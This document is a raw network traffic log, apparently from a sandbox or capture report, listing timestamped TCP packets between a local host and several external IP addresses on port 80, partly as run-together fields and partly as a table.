                                                                                                                                Oct 29, 2024 16:55:10.985034943 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:10.985960960 CET804972281.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:10.990006924 CET4972280192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:11.229927063 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:11.273473978 CET804972381.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:11.278081894 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:11.289499998 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:11.295202971 CET804972381.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:11.295295954 CET804972381.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:12.115180016 CET804972381.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:12.160258055 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:12.450161934 CET804972381.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:12.450376034 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:12.804591894 CET4972380192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:13.823796988 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:13.829236031 CET804972481.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:13.829302073 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:13.837423086 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:13.842845917 CET804972481.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:14.693185091 CET804972481.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:14.838028908 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:15.042315006 CET804972481.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:15.046088934 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:15.050494909 CET4972480192.168.2.881.169.145.95
                                                                                                                                Oct 29, 2024 16:55:15.055984020 CET804972481.169.145.95192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:20.143553972 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:20.149003029 CET804972545.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:20.149071932 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:20.164558887 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:20.169948101 CET804972545.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:20.852406979 CET804972545.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:20.980036020 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:21.196187019 CET804972545.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:21.196538925 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:21.679536104 CET4972580192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:22.698820114 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:22.704377890 CET804972645.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:22.704493999 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:22.715728998 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:22.721326113 CET804972645.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:23.398262978 CET804972645.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:23.476368904 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:23.738148928 CET804972645.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:23.738405943 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:24.226497889 CET4972680192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:25.245769024 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:25.251940012 CET804972745.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:25.252049923 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:25.264614105 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:25.270072937 CET804972745.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:25.270199060 CET804972745.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:25.959002018 CET804972745.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:26.007617950 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:26.300317049 CET804972745.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:26.306119919 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:26.773426056 CET4972780192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:27.793939114 CET4972880192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:27.800713062 CET804972845.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:27.802037001 CET4972880192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:27.809933901 CET4972880192.168.2.845.79.252.94
                                                                                                                                Oct 29, 2024 16:55:27.815628052 CET804972845.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:28.497112989 CET804972845.79.252.94192.168.2.8
                                                                                                                                Oct 29, 2024 16:55:28.616460085 CET4972880192.168.2.845.79.252.94
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 29, 2024 16:55:28.834345102 CET | 80 | 49728 | 45.79.252.94 | 192.168.2.8
Oct 29, 2024 16:55:28.834453106 CET | 49728 | 80 | 192.168.2.8 | 45.79.252.94
Oct 29, 2024 16:55:28.835737944 CET | 49728 | 80 | 192.168.2.8 | 45.79.252.94
Oct 29, 2024 16:55:28.841178894 CET | 80 | 49728 | 45.79.252.94 | 192.168.2.8
Oct 29, 2024 16:55:33.929929972 CET | 49729 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:33.935455084 CET | 80 | 49729 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:33.935532093 CET | 49729 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:33.945928097 CET | 49729 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:33.951792955 CET | 80 | 49729 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:34.574779034 CET | 80 | 49729 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:34.574799061 CET | 80 | 49729 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:34.574846029 CET | 49729 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:35.035836935 CET | 80 | 49729 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:35.035893917 CET | 49729 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:35.460844994 CET | 49729 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:36.479774952 CET | 49730 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:36.704883099 CET | 80 | 49730 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:36.705032110 CET | 49730 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:36.717390060 CET | 49730 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:36.723062038 CET | 80 | 49730 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:37.433291912 CET | 80 | 49730 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:37.433309078 CET | 80 | 49730 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:37.433325052 CET | 80 | 49730 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:37.433387041 CET | 49730 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:37.433387995 CET | 49730 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:37.778143883 CET | 80 | 49730 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:37.781246901 CET | 49730 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:38.226732016 CET | 49730 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:39.327150106 CET | 49731 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:39.332665920 CET | 80 | 49731 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:39.332741022 CET | 49731 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:39.493612051 CET | 49731 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:39.499234915 CET | 80 | 49731 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:39.500035048 CET | 80 | 49731 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:40.087987900 CET | 80 | 49731 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:40.088025093 CET | 80 | 49731 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:40.088180065 CET | 49731 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:40.088213921 CET | 80 | 49731 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:40.088277102 CET | 49731 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:40.417989016 CET | 80 | 49731 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:40.421117067 CET | 49731 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:41.007776976 CET | 49731 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:42.149945974 CET | 49732 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:42.155441999 CET | 80 | 49732 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:42.155580044 CET | 49732 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:42.173944950 CET | 49732 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:42.179418087 CET | 80 | 49732 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:42.781121016 CET | 80 | 49732 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:42.781181097 CET | 80 | 49732 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:42.781295061 CET | 49732 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:43.253509998 CET | 80 | 49732 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:43.253619909 CET | 49732 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:43.254672050 CET | 49732 | 80 | 192.168.2.8 | 199.59.243.227
Oct 29, 2024 16:55:43.260077000 CET | 80 | 49732 | 199.59.243.227 | 192.168.2.8
Oct 29, 2024 16:55:48.797230005 CET | 49733 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:48.803664923 CET | 80 | 49733 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:48.803735018 CET | 49733 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:48.818051100 CET | 49733 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:48.823390961 CET | 80 | 49733 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:49.707384109 CET | 80 | 49733 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:49.707557917 CET | 80 | 49733 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:49.707681894 CET | 49733 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:49.860733032 CET | 80 | 49733 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:49.862060070 CET | 49733 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:50.321959972 CET | 49733 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:51.339413881 CET | 49734 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:51.345032930 CET | 80 | 49734 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:51.345149040 CET | 49734 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:51.359780073 CET | 49734 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:51.365901947 CET | 80 | 49734 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:52.267349005 CET | 80 | 49734 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:52.267368078 CET | 80 | 49734 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:52.267513037 CET | 49734 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:52.387032032 CET | 80 | 49734 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:52.387120008 CET | 49734 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:52.867069960 CET | 49734 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:53.888081074 CET | 49735 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:53.895020008 CET | 80 | 49735 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:53.895124912 CET | 49735 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:53.905730009 CET | 49735 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:53.913412094 CET | 80 | 49735 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:53.913445950 CET | 80 | 49735 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:54.805387020 CET | 80 | 49735 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:54.805699110 CET | 80 | 49735 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:54.805741072 CET | 49735 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:54.993230104 CET | 80 | 49735 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:54.993292093 CET | 49735 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:55.413958073 CET | 49735 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:56.433474064 CET | 49736 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:56.439424038 CET | 80 | 49736 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:56.439524889 CET | 49736 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:56.447685957 CET | 49736 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:56.453449011 CET | 80 | 49736 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:57.317842960 CET | 80 | 49736 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:57.317871094 CET | 80 | 49736 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:57.317995071 CET | 49736 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:57.459660053 CET | 80 | 49736 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:55:57.459769011 CET | 49736 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:57.460844040 CET | 49736 | 80 | 192.168.2.8 | 163.44.176.12
Oct 29, 2024 16:55:57.466177940 CET | 80 | 49736 | 163.44.176.12 | 192.168.2.8
Oct 29, 2024 16:56:02.571183920 CET | 49737 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:02.576550961 CET | 80 | 49737 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:02.576616049 CET | 49737 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:02.589799881 CET | 49737 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:02.595051050 CET | 80 | 49737 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:03.415945053 CET | 80 | 49737 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:03.460799932 CET | 49737 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:03.754133940 CET | 80 | 49737 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:03.754339933 CET | 49737 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:04.104073048 CET | 49737 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:05.121498108 CET | 49738 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:05.126969099 CET | 80 | 49738 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:05.127051115 CET | 49738 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:05.139717102 CET | 49738 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:05.145041943 CET | 80 | 49738 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:06.013858080 CET | 80 | 49738 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:06.070209026 CET | 49738 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:06.356308937 CET | 80 | 49738 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:06.356389046 CET | 49738 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:06.648401976 CET | 49738 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:07.668417931 CET | 49739 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:07.673763037 CET | 80 | 49739 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:07.673866987 CET | 49739 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:07.682970047 CET | 49739 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:07.688620090 CET | 80 | 49739 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:07.688653946 CET | 80 | 49739 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:08.795032978 CET | 80 | 49739 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:08.796650887 CET | 80 | 49739 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:08.796705008 CET | 49739 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:08.883111954 CET | 80 | 49739 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:08.883164883 CET | 49739 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:09.195334911 CET | 49739 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:10.216123104 CET | 49740 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:10.221565962 CET | 80 | 49740 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:10.221662998 CET | 49740 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:10.230237961 CET | 49740 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:10.235677004 CET | 80 | 49740 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:11.066350937 CET | 80 | 49740 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:11.117094040 CET | 49740 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:11.403826952 CET | 80 | 49740 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:11.403939962 CET | 49740 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:11.405400038 CET | 49740 | 80 | 192.168.2.8 | 195.110.124.133
Oct 29, 2024 16:56:11.411257982 CET | 80 | 49740 | 195.110.124.133 | 192.168.2.8
Oct 29, 2024 16:56:16.452013969 CET | 49741 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:16.459522963 CET | 80 | 49741 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:16.460236073 CET | 49741 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:16.476011992 CET | 49741 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:16.481997013 CET | 80 | 49741 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:17.162269115 CET | 80 | 49741 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:17.210819960 CET | 49741 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:17.507817030 CET | 80 | 49741 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:17.507860899 CET | 49741 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:17.978009939 CET | 49741 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:19.032890081 CET | 49742 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:19.038419962 CET | 80 | 49742 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:19.038492918 CET | 49742 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:19.059444904 CET | 49742 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:19.064807892 CET | 80 | 49742 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:19.730755091 CET | 80 | 49742 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:19.790010929 CET | 49742 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:20.076436043 CET | 80 | 49742 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:20.076564074 CET | 49742 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:20.570302963 CET | 49742 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:21.614080906 CET | 49743 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:21.620026112 CET | 80 | 49743 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:21.620229959 CET | 49743 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:21.633569956 CET | 49743 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:21.639202118 CET | 80 | 49743 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:21.639241934 CET | 80 | 49743 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:22.304447889 CET | 80 | 49743 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:22.352555037 CET | 49743 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:22.644002914 CET | 80 | 49743 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:22.644079924 CET | 49743 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:23.148792982 CET | 49743 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:24.169025898 CET | 49744 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:24.175851107 CET | 80 | 49744 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:24.178175926 CET | 49744 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:24.193042040 CET | 49744 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:24.199089050 CET | 80 | 49744 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:24.861367941 CET | 80 | 49744 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:24.913954020 CET | 49744 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:25.204220057 CET | 80 | 49744 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:25.204334021 CET | 49744 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:25.205169916 CET | 49744 | 80 | 192.168.2.8 | 67.223.117.142
Oct 29, 2024 16:56:25.211308956 CET | 80 | 49744 | 67.223.117.142 | 192.168.2.8
Oct 29, 2024 16:56:30.646805048 CET | 49745 | 80 | 192.168.2.8 | 107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:30.653558969 CET8049745107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:30.653629065 CET4974580192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:30.667268038 CET4974580192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:30.673484087 CET8049745107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:31.587364912 CET8049745107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:31.634020090 CET4974580192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:31.755883932 CET8049745107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:31.756062984 CET4974580192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:32.179680109 CET4974580192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:33.202667952 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:33.208163023 CET8049746107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:33.208231926 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:33.223953962 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:33.229746103 CET8049746107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:34.132483006 CET8049746107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:34.179692984 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:34.301268101 CET8049746107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:34.302124023 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:34.726644039 CET4974680192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:35.745785952 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:36.201339960 CET8049747107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:36.206022978 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:36.359710932 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:36.365271091 CET8049747107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:36.365417004 CET8049747107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:37.280574083 CET8049747107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:37.320236921 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:37.368793964 CET8049747107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:37.368890047 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:37.867244005 CET4974780192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:38.887628078 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:38.893040895 CET8049748107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:38.893117905 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:38.902292967 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:38.907773972 CET8049748107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:39.833916903 CET8049748107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:39.886023998 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:40.013588905 CET8049748107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:40.013719082 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:40.017967939 CET4974880192.168.2.8107.163.130.253
                                                                                                                                Oct 29, 2024 16:56:40.023375034 CET8049748107.163.130.253192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:45.179335117 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:45.185513020 CET804974995.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:45.185587883 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:45.198911905 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:45.205059052 CET804974995.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:46.061676979 CET804974995.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:46.101511955 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:46.411993980 CET804974995.216.25.89192.168.2.8
                                                                                                                                Oct 29, 2024 16:56:46.414114952 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:46.711220980 CET4974980192.168.2.895.216.25.89
                                                                                                                                Oct 29, 2024 16:56:47.734045982 CET4975080192.168.2.895.216.25.89
